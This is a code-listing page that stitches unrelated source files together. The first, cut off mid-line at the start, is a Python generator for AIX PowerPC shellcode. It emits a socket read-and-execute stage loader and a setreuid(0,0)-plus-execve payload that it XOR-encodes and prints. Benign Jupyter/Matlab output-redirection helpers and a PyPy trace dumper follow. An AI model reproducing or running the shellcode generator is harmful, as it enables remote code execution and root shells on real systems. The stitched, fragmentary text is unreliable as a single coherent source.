bufsize1064 ! r21 = pcloc1065 ! r28 = codeptr1066 ! r20 = tmp1067 ! r18 = main_loop1068 1069 ! before all asm code (MOSDEF entry point)1070 read_and_exec_loop:1071 1072 ! get our current location in memory1073 xor. r6, r6, r61074 bnel read_and_exec_loop1075 ! <-- that addr is now in $lr1076 pcloc:1077 mflr r211078 1079 """1080 1081 # if fd is already in $r30 we wont set it again just because it's nicer1082 # but we also save 4 bytes!!!1083 if str(args["fd"]) != "r30":1084 code += """1085 ! set provided sockfd1086 FD_SET_INSTR r30, FD ! fd1087 """1088 code += """1089 1090 ! get errno1091 lwz r25, 20(r1)1092 lwz r25, 64(r25) ! r25 = &errno1093 1094 ! mmap(0, 0x10000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_ANON, -1, 0);1095 li r3, 01096 lis r4, 11097 li r5, mmap_protections1098 li r6, MAP_ANON1099 li r7, -11100 mr r8, r31101 addi r20, r21, mmap_out - pcloc1102 mtlr r201103 li r2, SYS_mmap1104 crorc 6, 6, 61105 sc1106 mmap_out:1107 1108 cmpwi r3, MAP_FAILED1109 beq- failed1110 mr r31, r3 ! r31 = codebuf1111 1112 ! 
save <here> in r18 to come back directly here after exec the mmap buffer1113 addi r18, r21, main_loop - pcloc1114 1115 main_loop:1116 1117 ! set the first instruction of the mmap buffer: restore lr from r181118 set r28, restore_lr_after_jmp - pcloc1119 lwzx r28, r21, r281120 stw r28, 0(r31)1121 1122 ! read(FD, &nbytes, sizeof(nbytes));1123 read_size:1124 mr r3, r30 ! r30 = sockfd1125 addi r4, r31, 4 ! &mmap[4]1126 li r5, 41127 addi r20, r21, readsize_out - pcloc1128 mtlr r201129 li r2, SYS_kread1130 crorc 6, 6, 61131 sc1132 readsize_out:1133 1134 cmplwi r3, 4 ! if (r != sizeof(nbytes))1135 beq+ readsize_is_4_valid1136 cmpwi r3, -11137 bne- failed1138 lwz r4,0(r25) ! errno1139 cmpwi r4, EINTR ! errno == EINTR?1140 beq- read_size1141 b failed1142 readsize_is_4_valid:1143 lwz r29, 4(r31) ! r29 = *mmap[4] = codesize1144 1145 ! prepare r28 before read loop1146 addi r28, r31, 4 ! r28 = mmap_ptr = &mmap[4]1147 1148 ! read(FD, codeptr, nbytes);1149 read_buf:1150 cmpwi r29, 0 ! while (nbytes) ! do we still need to read some bytes?1151 beq- exec_code ! if no, we can exec the recently read code1152 mr r3, r30 ! arg0 = r30 = sockfd1153 mr r4, r28 ! arg1 = mmap_ptr1154 mr r5, r29 ! arg2 = codesize1155 addi r20, r21, read_out - pcloc1156 mtlr r201157 li r2, SYS_kread1158 crorc 6, 6, 61159 sc1160 read_out:1161 1162 cmpwi r3, 01163 bgt+ read_out_ok ! we read smth1164 beq- failed ! read() returned 0: connection closed1165 ! here read() returned -1, we have to check errno1166 lwz r4, 0(r25) ! errno1167 cmpwi r4, EINTR1168 beq- read_buf ! if errno == EINTR: retry to read1169 b failed ! else we are mucked up1170 read_out_ok:1171 add r28, r28, r3 ! mmap_ptr += read_size1172 subfc r29, r3, r29 ! codesize -= read_size1173 bne- read_buf ! if codesize != 0: continue to read on sockfd1174 1175 exec_code:1176 mtlr r311177 li r2, SYS_sync1178 crorc 6, 6, 61179 sc1180 1181 ! _exit(random)1182 failed:1183 li r2, SYS__exit1184 crorc 6, 6, 61185 sc1186 1187 ! never reached1188 1189 ! 
following is used to patch sent code1190 restore_lr_after_jmp:1191 mtlr r181192 """1193 syscalls = ["SYS_mmap", "SYS_kread", "SYS__exit", "SYS_sync"]1194 constants = ["EINTR", "MAP_ANON", "MAP_FAILED"]1195 code = self.libc.patch_defines_with_values(code, syscalls + constants)1196 code = code.replace('mmap_protections', "%s" % mmap_protections)1197 code = code.replace("FD_SET_INSTR", fd_set_instr)1198 code = code.replace("FD", str(args["fd"]))1199 self.code+=code1200 1201 def munmap_caller(self, args): # TODO: supply size in argument1202 # this code must be at the begining of a codebuffer send to read_exec...1203 # it will munmap the page of the caller1204 # munmap(lr & ~0xffff, 0x10000)1205 1206 code="""1207 mflr r31208 munmap_caller:1209 xor. r6, r6, r61210 bnel- munmap_caller1211 ! <-- that addr is now in $lr1212 munmap_pc:1213 mflr r01214 addi r0, r0, munmap_out - munmap_pc1215 mtlr r01216 lis r2, -1 ! ~(0x10000 - 1)1217 and r3, r3, r2 ! r3 = ctr & ~(0x10000 - 1)1218 lis r4, 11219 li r2, SYS_munmap1220 crorc 6, 6, 61221 sc1222 munmap_out:1223 ! code continue here1224 """1225 code = self.libc.patch_defines_with_values(code, ["SYS_munmap"])1226 self.code += code1227 1228 def sendreg(self,args):1229 # send a 32-Bit register1230 fdreg = args["fdreg"]1231 #print "fdreg=%s"%fdreg1232 code="""1233 stwu r1, -144(r1)1234 stmw r2, 4(r1)1235 stw REGTOSEND, 140(r1)1236 sendreg:1237 xor. r6, r6, r61238 bnel sendreg1239 sendreg_here_in_lr:1240 mflr r201241 mr r3, FDREG ! arg01242 addi r4, r1,140 ! arg1 = buf1243 li r5, 4 ! arg2 = sizeof(int32) = 41244 addi r21, r20, sendreg_out - sendreg_here_in_lr1245 mtlr r211246 li r2, SYS_write1247 crorc 6, 6, 61248 sc1249 sendreg_out:1250 lmw r2, 4(r1)1251 lwz r1, 0(r1)1252 """1253 code=code.replace("FDREG",args["fdreg"])1254 code=code.replace("REGTOSEND",args["regtosend"])1255 code = self.libc.patch_defines_with_values(code, ["SYS_write"])1256 self.code+=code1257 1258 # This is the proper way to flush the caches on AIX .. 
you call1259 # SYS_sync and set the link register to the code you want to1260 # return to .. we also have to do this for our mosdef callbacks1261 # and anything else that reads in code ..1262 #1263 # e.g. in pseudo-code1264 #1265 # code = read(1024)1266 # flushcache(code)1267 # {1268 # mtrl %0 : : "r" (code)1269 # SYS_sync() -> returns to code via link register1270 # }1271 #1272 def flushcache(self,args):1273 # flush the cache where $pc is, and continue code execution1274 code="""1275 flushcache:1276 xor. r6, r6, r61277 bnel flushcache1278 flushcache_here_in_lr:1279 mflr r201280 addi r20, r20, flushcache_out - flushcache_here_in_lr1281 mtlr r201282 li r2, SYS_sync1283 crorc 6, 6, 61284 sc1285 flushcache_out:1286 ! continue code execution1287 """1288 code = self.libc.patch_defines_with_values(code, ["SYS_sync"])1289 self.code+=code1290 1291 def test(self):1292 self.addAttr("read_and_exec_loop", {'fd': -1})1293 self.addAttr("exit", None)1294if __name__=="__main__":1295 sc = aix_powerpc(version = '5.2')1296 sc.addAttr('setreuid', { 'ruid' : 0, 'euid' : 0 })1297 sc.addAttr('execve', None)1298 data = sc.get()1299 encoded = sc.xor_encode(data, xormask=0xae)1300 print("Payload: %d bytes" % len(encoded))1301 n = 0 1302 for c in encoded:1303 if n == 0:1304 sys.stdout.write("\"")1305 sys.stdout.write("\\x%.2x" % ord(c))1306 n += 11307 if n == 4:1308 n = 0...
IPythonMagics.py
from IPython import get_ipython
from IPython.core import magic_arguments
from IPython.core.magic import Magics, magics_class, line_magic
from IPython.display import Image, display
import ipykernel
import threading
import ctypes
import time
import sys
import io
import os
try:
    from tempfile import TemporaryDirectory, TemporaryFile, NamedTemporaryFile
except ImportError:
    from backports.tempfile import TemporaryDirectory, TemporaryFile, NamedTemporaryFile

# Module-wide handle to the live MatlabMagics instance (set in its __init__).
# showPlot() and Redirection read their configuration through it.
_magic_class_ref = None

# We will overload the `post_run_cell` event with this function
# That callback is a method of `EventManager` hence the `self` argument
def showPlot(self=None, result=None):
    """Render every open Matlab figure to a PNG and display it in the notebook.

    Does nothing when there is no IPython shell, no MatlabMagics instance,
    the plot type is not 'inline', or the `matlab` package cannot be imported.
    """
    # We use a global reference to the magics class to get the reference to Matlab interpreter
    # If it doesn't exist, we can't do anything, and assume the user is just using Python
    ip = get_ipython()
    if ip is None or _magic_class_ref is None or _magic_class_ref.plot_type != 'inline':
        return
    try:
        from matlab import double as md
    except ImportError:
        return
    else:
        if _magic_class_ref.m is None:
            from . import Matlab
            _magic_class_ref.m = Matlab().interface
        interface = _magic_class_ref.m
    # Children of the Matlab root object (handle 0); one image is written per child.
    nfig = len(interface.call('get',(0., "children")))
    if nfig == 0:
        return
    # One-shot parameters (next_pars) take precedence over the defaults.
    if _magic_class_ref.next_pars:
        width, height, resolution = (_magic_class_ref.next_pars[idx] for idx in ['width', 'height', 'resolution'])
    else:
        width, height, resolution = (_magic_class_ref.width, _magic_class_ref.height, _magic_class_ref.resolution)
    # Paper size is given in inches, hence pixels / dpi.
    interface.call('set', (0., 'defaultfigurepaperposition', md([0, 0, width / resolution, height / resolution])), nargout=0)
    interface.call('set', (0., 'defaultfigurepaperunits', 'inches'), nargout=0)
    format = 'png'
    with TemporaryDirectory() as tmpdir:
        try:
            # NOTE(review): the Matlab command is assembled with str.format and handed to
            # `eval`. The interpolated values are the temporary directory path, the literal
            # 'png', `resolution` and `nfig`. The path ends up inside a single-quoted Matlab
            # string that is also a sprintf format, so a quote or '%' in the temp path (it
            # follows the process's temp-dir settings) would alter the command. `resolution`
            # is only known to be an int when it came through the `type=int` magic
            # arguments. Confirm how next_pars is populated.
            interface.call('eval',
                ["arrayfun(@(h, i) print(h, sprintf('{}/%i', i), '-d{}', '-r{}'),get(0, 'children'), (1:{})')"
                    .format('/'.join(tmpdir.split(os.sep)), format, resolution, nfig)],
                nargout=0)
            interface.call('eval', ["arrayfun(@(h) close(h), get(0, 'children'))"], nargout=0)
            # Files are named by figure index; display them in sorted filename order.
            for fname in sorted(os.listdir(tmpdir)):
                display(Image(filename=os.path.join(tmpdir, fname)))
        except Exception as exc:
            ip.showtraceback()
            return
        finally:
            # Runs on success and on failure: keep figures hidden and drop the one-shot parameters.
            interface.call('set', (0., 'defaultfigurevisible', 'off'), nargout=0)
            if _magic_class_ref.next_pars:
                _magic_class_ref.next_pars = None

# Matlab writes to the C-level stdout / stderr file descriptors
# whereas IPython overloads the Python-level sys.stdout / sys.stderr streams
# To force Matlab output into the IPython cells we need to
#   1. Duplicate the stdout/err file descriptors into a pipe (with os.dup2)
#   2. Create a thread which watches the pipe and re-prints to IPython
# See: https://stackoverflow.com/questions/41216215/
#      https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/
class Redirection(object):
    # Class which redirects a C-level file descriptor to the equiv. IPython stream
    thread = None      # reader thread started by pre()
    stop_flag = None   # set to True by post() to end the reader loop
    saved_fd = None    # duplicate of the original descriptor, used to restore it
    read_pipe = None   # read end of the pipe that replaces the descriptor
    exc_info = None    # sys.exc_info() of a failure inside the reader thread

    def __init__(self, target='stdout'):
        # `target` is the descriptor number of the interpreter's original stream
        # (sys.__stdout__ / sys.__stderr__); `output` is the stream currently
        # installed as sys.stdout / sys.stderr, which receives the text.
        self.target = {'stdout':sys.__stdout__, 'stderr':sys.__stderr__}[target].fileno()
        self.output = {'stdout':sys.stdout, 'stderr':sys.stderr}[target]
        self.ip = get_ipython()
        # No-op by default; presumably replaced by the caller with a real flush -- TODO confirm
        self.flush = lambda: None

    def not_redirecting(self):
        # True when there is no shell or magics instance, or when output is not
        # 'inline' and no redirection is currently active.
        return (
            self.ip is None or _magic_class_ref is None or
            (_magic_class_ref.output != 'inline' and self.saved_fd == None)
        )

    def pre(self):
        """Point the target descriptor at a pipe and start the thread that drains it."""
        if self.not_redirecting():
            return
        if self.saved_fd == None:
            self.saved_fd = os.dup(self.target)
            self.read_pipe, write_pipe = os.pipe()
            os.dup2(write_pipe, self.target)
            # The target descriptor now refers to the pipe; the extra handle is not needed.
            os.close(write_pipe)
            def redirect_thread():
                try:
                    while not self.stop_flag:
                        raw = os.read(self.read_pipe, 1000)
                        if raw:
                            # NOTE(review): each chunk of up to 1000 bytes is decoded on its
                            # own, so a multi-byte character split across two reads raises
                            # here and ends the loop through the handler below.
                            self.output.write(raw.decode())
                            self.flush()
                except Exception:
                    self.exc_info = sys.exc_info()
            self.stop_flag = False
            self.thread = threading.Thread(target=redirect_thread)
            self.thread.daemon = True # Daemon thread: it does not keep the interpreter alive at exit
            self.thread.start()

    def showtraceback(self):
        self.ip.showtraceback()

    def post(self):
        """Restore the original descriptor and stop the reader thread."""
        if self.not_redirecting() or self.saved_fd == None:
            return
        # Always flushes sys.stdout, also when this instance targets stderr.
        sys.stdout.flush()
        os.dup2(self.saved_fd, self.target)
        self.stop_flag = True
        # NOTE(review): read_pipe is closed while the reader may still be inside os.read();
        # an error raised by that read is stored in exc_info and shown below, and the
        # descriptor number could in principle be reused meanwhile -- confirm this ordering
        # is intended.
        os.close(self.read_pipe)
        os.close(self.saved_fd)
        # The thread is only joined on Linux and macOS.
        if sys.platform.startswith("linux") or sys.platform.startswith("darwin"):
            self.thread.join()
        self.thread = None
        self.saved_fd = None
        # NOTE(review): exc_info is never cleared in the code shown, so a stored error
        # appears to be reported again by later post() calls -- confirm.
        if self.exc_info:
            self.showtraceback()

@magics_class
class MatlabMagics(Magics):
    """
    Class for IPython magics for interacting with Matlab

    It defines several magic functions:

    %pace - sets up the plotting environment (default 'inline')
    %matlab_fig - defines the inline figure size and resolution for the next plot only
    """
    def __init__(self, shell, interface):
        super(MatlabMagics, self).__init__(shell)
        self.m = interface
        # NOTE(review): this rebinds `self.shell` to the class *name* of the running shell;
        # presumably the base class had stored the shell object there -- confirm nothing
        # relies on that.
        self.shell = get_ipython().__class__.__name__
        self.output = 'inline'
        # Inline plots only by default under the ZMQ (notebook/kernel) shell.
        self.plot_type = 'inline' if self.shell == 'ZMQInteractiveShell' \
                         else 'windowed'
        self.width = 400
        self.height = 300
        # NOTE(review): the help strings and docstrings below state a default of 150 dpi,
        # but the value set here is 300 -- confirm which one is intended.
        self.resolution = 300
        self.next_pars = None
        # Publish this instance for showPlot() and Redirection.
        global _magic_class_ref
        _magic_class_ref = self

    @line_magic
    @magic_arguments.magic_arguments()
    @magic_arguments.argument('plot_type', type=str, help="Matlab plot type, either: 'inline' or 'windowed'")
    @magic_arguments.argument('output', nargs='?', type=str, help="Matlab output, either: 'inline' or 'console'")
    @magic_arguments.argument('-w', '--width', type=int, help="Default figure width in pixels [def: 400]")
    @magic_arguments.argument('-h', '--height', type=int, help="Default figure height in pixels [def: 300]")
    @magic_arguments.argument('-r', '--resolution', type=int, help="Default figure resolution in dpi [def: 150]")
    def pace(self, line):
        """Set up pace_neutrons to work with IPython notebooks

        Use this magic function to set the behaviour of Matlab programs Horace and SpinW in Python.
        You can specify how plots should appear: either 'inline' [default] or 'windowed'.
        You can also specify how Matlab text output from functions appear: 'inline' [default] or 'console'

        Examples
        --------
        By default the inline backend is used for both figures and outputs.
        To switch behaviour, use:

            In [1]: %pace windowed            # windowed figures, output unchanged ('inline' default)
            In [2]: %pace console             # figure unchanged ('inline' default), console output
            In [3]: %pace windowed console    # windowed figures, console output
            In [4]: %pace inline inline       # inline figures, inline output
            In [5]: %pace inline              # inline figures, inline output
            In [6]: %pace inline console      # inline figures, console output
            In [7]: %pace windowed inline     # windowed figures, inline output

        Note that if you specify `%pace inline` this sets `'inline'` for _both_ figures and outputs.
        If you want inline figures and console outputs or windowed figures and inline output you must specify
        that specifically.

        Note that using (default) inline text output imposes a slight performance penalty.

        For inlined figures, you can also set the default figure size and resolution with

            In [8]: %pace inline --width 400 --height 300 --resolution 150

        The values are in pixels for the width and height and dpi for resolution. A short cut:

            In [9]: %pace inline -w 400 -h 300 -r 150

        Also works. The width, height and resolution only applies to inline figures.
        You should use the usual Matlab commands to resize windowed figures.
        """
        args = magic_arguments.parse_argstring(self.pace, line)
        # NOTE(review): `plot_type` is the first positional argument, so `%pace console`
        # (example 2 in the docstring) appears to arrive here as plot_type='console' and
        # reach the RuntimeError branch below -- confirm.
        plot_type = args.plot_type if args.plot_type else self.plot_type
        output = args.output if args.output else self.output
        # A bare `%pace inline` switches the text output to inline as well.
        if args.plot_type and args.plot_type == 'inline' and args.output == None:
            output = 'inline'
        # `output` is stored as given; only plot_type is checked against known values.
        self.output = output
        if plot_type == 'inline':
            self.plot_type = plot_type
            # Size options update the defaults only for inline plots; a value of 0 is ignored.
            if args.width: self.width = args.width
            if args.height: self.height = args.height
            if args.resolution: self.resolution = args.resolution
        elif plot_type == 'windowed':
            self.plot_type = plot_type
        else:
            raise RuntimeError(f'Unknown plot type {plot_type}')
        # Without the `matlab` package the settings are stored but not pushed to Matlab.
        try:
            import matlab
        except ImportError:
            return
        if plot_type == 'inline':
            self.m.call('set', (0., 'defaultfigurevisible', 'off'), nargout=0)
            self.m.call('set', (0., 'defaultfigurepaperpositionmode', 'manual'), nargout=0)
        elif plot_type == 'windowed':
            self.m.call('set', (0., 'defaultfigurevisible', 'on'), nargout=0)
            self.m.call('set', (0., 'defaultfigurepaperpositionmode', 'auto'), nargout=0)
        else:
            raise RuntimeError(f'Unknown plot type {plot_type}')

    @line_magic
    @magic_arguments.magic_arguments()
    @magic_arguments.argument('-w', '--width', type=int, help="Default figure width in pixels [def: 400]")
    @magic_arguments.argument('-h', '--height', type=int, help="Default figure height in pixels [def: 300]")
    @magic_arguments.argument('-r', '--resolution', type=int, help="Default figure resolution in dpi [def: 150]")
    def matlab_fig(self, line):
        """Defines size and resolution of the next inline Matlab figure to be plotted

        Use this magic function to define the figure size and resolution of the next figure
        (and only that figure) without changing the default size and resolution.

        Examples
        --------
        Size and resolution is specified as options, any which is not defined here will use the default values
        These values are reset after the figure is plotted (default: width=400, height=300, resolution=150)

            In [1]: %matlab_fig -w 800 -h 200 -r 300
                    m.plot(-pi:0.01:pi, sin(-pi:0.01:pi), '-')
            In [2]: m.plot(-pi:0.01:pi, cos(-pi:0.01:pi), '-')

        The sine graph in the first cell will be 800x200 at 300 dpi, whilst the cosine graph is 400x300 150 dpi.
        """
        args = magic_arguments.parse_argstring(self.matlab_fig, line)
        # Options that were not given fall back to the current defaults.
        width = args.width if args.width else self.width
        height = args.height if args.height else self.height
        resolution = args.resolution if args.resolution else self.resolution
        # ... (the listing is truncated here on the source page)
redirections.py
Source:redirections.py
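"""Capture & redirect output from 3rd party C/C++ libraries
Inspired from code by Eli Bendersky
https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/#id1
"""
import typing, traceback
from contextlib import contextmanager
import ctypes
import io
import os, sys
import tempfile

# Handle to the C runtime already loaded in this process, and the addresses of
# its `stdout` / `stderr` stream objects, so the C-level buffers can be flushed
# around every descriptor swap.
libc = ctypes.CDLL(None)
c_stdout = ctypes.c_void_p.in_dll(libc, 'stdout')
c_stderr = ctypes.c_void_p.in_dll(libc, 'stderr')


@contextmanager
def _fd_redirector(stream_name, c_stream, stream):
    """Capture everything written to one standard descriptor into `stream`.

    stream_name -- 'stdout' or 'stderr'; selects the `sys` attribute whose
                   file descriptor is redirected.
    c_stream    -- the matching C stream object (c_stdout / c_stderr).
    stream      -- text sink; receives the captured output through write()
                   once the block has finished without raising.

    The Python stream object is left in place and only the descriptor behind
    it is swapped. The descriptor is restored in a `finally`, so an exception
    raised inside the block cannot leave the process writing to the temporary
    file. Raises whatever `fileno()` raises when the Python stream has no
    file descriptor.
    """
    py_stream = getattr(sys, stream_name)
    target_fd = py_stream.fileno()
    # Duplicate of the original destination; needed to put it back afterwards.
    saved_fd = os.dup(target_fd)
    try:
        # tempfile creates an anonymous file private to this process.
        with tempfile.TemporaryFile(mode='w+b') as tfile:
            # Push out anything still buffered so it reaches the real destination.
            py_stream.flush()
            libc.fflush(c_stream)
            os.dup2(tfile.fileno(), target_fd)
            try:
                yield
            finally:
                try:
                    # Output still buffered belongs to the capture file.
                    py_stream.flush()
                    libc.fflush(c_stream)
                finally:
                    # Restore the descriptor even if a flush fails.
                    os.dup2(saved_fd, target_fd)
            tfile.seek(0, io.SEEK_SET)
            captured = tfile.read()
        # Native libraries may emit bytes that are not valid text; replace them
        # instead of losing the whole capture to a decode error.
        encoding = getattr(py_stream, 'encoding', None) or 'utf-8'
        stream.write(captured.decode(encoding, errors='replace'))
    finally:
        os.close(saved_fd)


@contextmanager
def stdout_redirector(stream):
    """Redirect stdout, including C-level writes, into `stream` for the block.

    `sys.stdout` is neither closed nor replaced. The captured text is written
    to `stream` when the block finishes without raising.
    """
    with _fd_redirector('stdout', c_stdout, stream):
        yield


@contextmanager
def stderr_redirector(stream):
    """Redirect stderr, including C-level writes, into `stream` for the block.

    `sys.stderr` is neither closed nor replaced, so Python error output keeps
    working after the block. The captured text is written to `stream` when the
    block finishes without raising.
    """
    with _fd_redirector('stderr', c_stderr, stream):
        yield

# ... (the listing is truncated here on the source page)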
dump.py
Source:dump.py
import os
from pypy.objspace.proxy import patch_space_in_place
from pypy.objspace.std.objspace import StdObjSpace, W_Object
from pypy.interpreter.error import OperationError
from pypy.interpreter import baseobjspace

# Name and creation mode of the trace file written by Dumper.
# NOTE(review): the name is fixed and relative, so the file is created in
# whatever the current working directory is when Dumper.open() runs.
DUMP_FILE_NAME = 'pypy-space-dump'
DUMP_FILE_MODE = 0600

class Dumper(object):
    """Writes a line-based trace of object-space operations to a file."""
    # -1 means "no dump file open"; every dump_* method checks for >= 0.
    dump_fd = -1

    def __init__(self, space):
        self.space = space
        # Cache: wrapped object -> textual representation used in the trace.
        self.dumpspace_reprs = {}

    def open(self):
        """Seed the repr cache and open the dump file if it is not open yet."""
        space = self.space
        self.dumpspace_reprs.update({
            space.w_None: 'None',
            space.w_False: 'False',
            space.w_True: 'True',
            })
        if self.dump_fd < 0:
            # NOTE(review): the flags are O_CREAT|O_TRUNC without O_EXCL or O_NOFOLLOW,
            # so an existing file -- or the target of an existing symlink -- at
            # DUMP_FILE_NAME is opened and truncated. DUMP_FILE_MODE only takes effect
            # when the file is newly created. Confirm this only ever runs in a directory
            # the user controls.
            self.dump_fd = os.open(DUMP_FILE_NAME,
                                   os.O_WRONLY|os.O_CREAT|os.O_TRUNC,
                                   DUMP_FILE_MODE)

    def close(self):
        """Close the dump file (if open) and empty the repr cache."""
        if self.dump_fd >= 0:
            os.close(self.dump_fd)
            self.dump_fd = -1
        self.dumpspace_reprs.clear()

    def dump_get_repr(self, w_obj):
        """Return the cached text for w_obj, computing and caching it on a miss."""
        try:
            return self.dumpspace_reprs[w_obj]
        except KeyError:
            saved_fd = self.dump_fd
            try:
                # dump_fd is parked at -1 while the repr is computed; presumably so that
                # the space operations used below are not traced themselves -- confirm.
                self.dump_fd = -1
                space = self.space
                if isinstance(w_obj, W_Object):
                    w_type = space.type(w_obj)
                else:
                    w_type = None
                if w_type is space.w_int:
                    n = space.int_w(w_obj)
                    s = str(n)
                elif w_type is space.w_str:
                    # Strings are written in full inside single quotes: backslashes are
                    # doubled and characters below ' ' become \n, \t or \xNN, which keeps
                    # each trace record on one line.
                    # NOTE(review): a single quote inside the string is not escaped, and
                    # the full contents of every traced string end up in the dump file.
                    s = space.str_w(w_obj)
                    digit2hex = '0123456789abcdef'
                    lst = ["'"]
                    for c in s:
                        if c == '\\':
                            lst.append('\\')
                        if c >= ' ':
                            lst.append(c)
                        else:
                            lst.append('\\')
                            if c == '\n':
                                lst.append('n')
                            elif c == '\t':
                                lst.append('t')
                            else:
                                lst.append('x')
                                lst.append(digit2hex[ord(c) >> 4])
                                lst.append(digit2hex[ord(c) & 0xf])
                    lst.append("'")
                    s = ''.join(lst)
                elif w_type is space.w_float:
                    n = space.float_w(w_obj)
                    s = str(n)
                else:
                    # Fallback: default string form plus id(); this text is not escaped.
                    s = '%s at 0x%x' % (w_obj, id(w_obj))
                self.dumpspace_reprs[w_obj] = s
            finally:
                self.dump_fd = saved_fd
            return s

    def dump_enter(self, opname, args_w):
        # One CALL record per operation; argument reprs are separated by tabs.
        if self.dump_fd >= 0:
            text = '\t'.join([self.dump_get_repr(w_arg) for w_arg in args_w])
            os.write(self.dump_fd, '%s CALL %s\n' % (opname, text))

    def dump_returned_wrapped(self, opname, w_obj):
        # RETURN record that includes the repr of the wrapped result.
        if self.dump_fd >= 0:
            s = self.dump_get_repr(w_obj)
            os.write(self.dump_fd, '%s RETURN %s\n' % (opname, s))

    def dump_returned(self, opname):
        # RETURN record for operations whose result is not a wrapped object.
        if self.dump_fd >= 0:
            os.write(self.dump_fd, '%s RETURN\n' % (opname,))

    def dump_raised(self, opname, e):
        # RAISE record. NOTE(review): the error text is written as-is, so a message
        # containing a newline would span several lines of the trace.
        if self.dump_fd >= 0:
            if isinstance(e, OperationError):
                s = e.errorstr(self.space)
            else:
                s = '%s' % (e,)
            os.write(self.dump_fd, '%s RAISE %s\n' % (opname, s))

# for now, always make up a wrapped StdObjSpace
class DumpSpace(StdObjSpace):
    """StdObjSpace whose operations are wrapped by the proxies from proxymaker."""
    def __init__(self, *args, **kwds):
        # The dumper is created before the base initialiser runs.
        self.dumper = Dumper(self)
        StdObjSpace.__init__(self, *args, **kwds)
        patch_space_in_place(self, 'dump', proxymaker)

    def _freeze_(self):
        # remove strange things from the caches of self.dumper
        # before we annotate
        self.dumper.close()
        return StdObjSpace._freeze_(self)

    def startup(self):
        # The dump file is opened (and truncated) at startup, not at construction.
        StdObjSpace.startup(self)
        self.dumper.open()

    def finish(self):
        self.dumper.close()
        StdObjSpace.finish(self)

    def wrap(self, x):
        # wrap() is traced here directly (RETURN record only); proxymaker skips it.
        w_res = StdObjSpace.wrap(self, x)
        self.dumper.dump_returned_wrapped(' wrap', w_res)
        return w_res
    wrap._annspecialcase_ = "specialize:wrap"

Space = DumpSpace

# __________________________________________________________________________

# nb_args: operation name -> number of leading positional arguments that are
#          dumped as wrapped objects (see the args[:n] slice in proxymaker).
# op_returning_wrapped: names of the operations whose result is dumped as a
#          wrapped object.
nb_args = {}
op_returning_wrapped = {}

def setup():
    # Fill the two tables: hand-written entries first, then every entry of
    # ObjSpace.MethodTable (an existing nb_args entry is kept via setdefault).
    nb_args.update({
        # ---- irregular operations ----
        'wrap': 0,
        'str_w': 1,
        'int_w': 1,
        'float_w': 1,
        'uint_w': 1,
        'unicode_w': 1,
        'bigint_w': 1,
        'interpclass_w': 1,
        'unwrap': 1,
        'is_true': 1,
        'is_w': 2,
        'newtuple': 0,
        'newlist': 0,
        'newdict': 0,
        'newslice': 0,
        'call_args': 1,
        'marshal_w': 1,
        'log': 1,
        })
    op_returning_wrapped.update({
        'wrap': True,
        'newtuple': True,
        'newlist': True,
        'newdict': True,
        'newslice': True,
        'call_args': True,
        })
    for opname, _, arity, _ in baseobjspace.ObjSpace.MethodTable:
        nb_args.setdefault(opname, arity)
        op_returning_wrapped[opname] = True
    # Every irregular operation must have an explicit entry in the table above.
    for opname in baseobjspace.ObjSpace.IrregularOpTable:
        assert opname in nb_args, "missing %r" % opname

# Runs once at import time; the helper is removed afterwards.
setup()
del setup

# __________________________________________________________________________

def proxymaker(space, opname, parentfn):
    # Builds the tracing wrapper for one space operation; passed to
    # patch_space_in_place by DumpSpace.__init__. 'wrap' gets no proxy because
    # DumpSpace.wrap does its own tracing.
    if opname == 'wrap':
        return None
    returns_wrapped = opname in op_returning_wrapped
    # Right-aligned to 15 columns so the records line up in the dump file.
    aligned_opname = '%15s' % opname
    n = nb_args[opname]
    def proxy(*args, **kwds):
        dumper = space.dumper
        # Only the first n positional arguments are dumped.
        args_w = list(args[:n])
        dumper.dump_enter(aligned_opname, args_w)
        try:
            res = parentfn(*args, **kwds)
        except Exception, e:
            # Record the failure, then re-raise it unchanged.
            dumper.dump_raised(aligned_opname, e)
            raise
        else:
            if returns_wrapped:
                dumper.dump_returned_wrapped(aligned_opname, res)
            else:
                dumper.dump_returned(aligned_opname)
            return res
    proxy.func_name = 'proxy_%s' % (opname,)
    # ... (the listing is truncated here on the source page)